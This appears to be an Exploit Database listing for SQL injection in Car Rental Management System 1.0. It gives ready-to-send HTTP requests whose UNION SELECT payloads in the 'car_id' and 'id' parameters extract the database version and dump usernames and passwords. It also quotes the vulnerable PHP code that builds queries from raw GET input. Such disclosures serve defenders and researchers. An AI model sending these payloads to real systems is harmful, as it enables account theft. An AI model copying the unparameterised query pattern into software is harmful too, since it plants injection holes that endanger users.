66d1f19fa5
17 changes to exploits/shellcodes Internet Explorer 11 - Use-After-Free Microsoft Internet Explorer 11 - Use-After-Free LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption Aerospike Database 5.1.0.3 - OS Command Execution Apache Struts 2.5.20 - Double OGNL evaluation Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated) Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass SugarCRM 6.5.18 - Persistent Cross-Site Scripting WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting
55 lines
No EOL
2.2 KiB
Text
55 lines
No EOL
2.2 KiB
Text
# Exploit Title: Car Rental Management System 1.0 - 'car_id' Sql Injection
|
|
# Date: 2020-11.13
|
|
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
|
|
# Author ID: 8763
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
|
|
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
|
|
# Version: 1.0
|
|
# Tested on: Apache2 - Windows 10
|
|
|
|
Vulnerable param: car_id
|
|
-------------------------------------------------------------------------
|
|
GET /car_rental/booking.php?car_id=1+UNION+ALL+SELECT+1,@@VERSION,3,4,5,6,7,8,9,10# HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Connection: close
|
|
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
|
|
Upgrade-Insecure-Requests: 1
|
|
Cache-Control: max-age=0
|
|
|
|
|
|
Source Code:
|
|
|
|
booking.php:
|
|
--------------------------------------------------------------------
|
|
<?php
|
|
$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['car_id']);
|
|
foreach($qry->fetch_array() as $k => $val){
|
|
$$k=$val;
|
|
}
|
|
|
|
Vulnerable param: id
|
|
-------------------------------------------------------------------------
|
|
GET /car_rental/index.php?page=view_car&id=-3+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+users# HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Connection: close
|
|
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
|
|
Upgrade-Insecure-Requests: 1
|
|
Cache-Control: max-age=0
|
|
|
|
|
|
Source Code:
|
|
|
|
view_car.php:
|
|
--------------------------------------------------------------------
|
|
<?php
|
|
if(isset($_GET['id'])){
|
|
if(isset($_GET['id'])){
|
|
$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['id']); |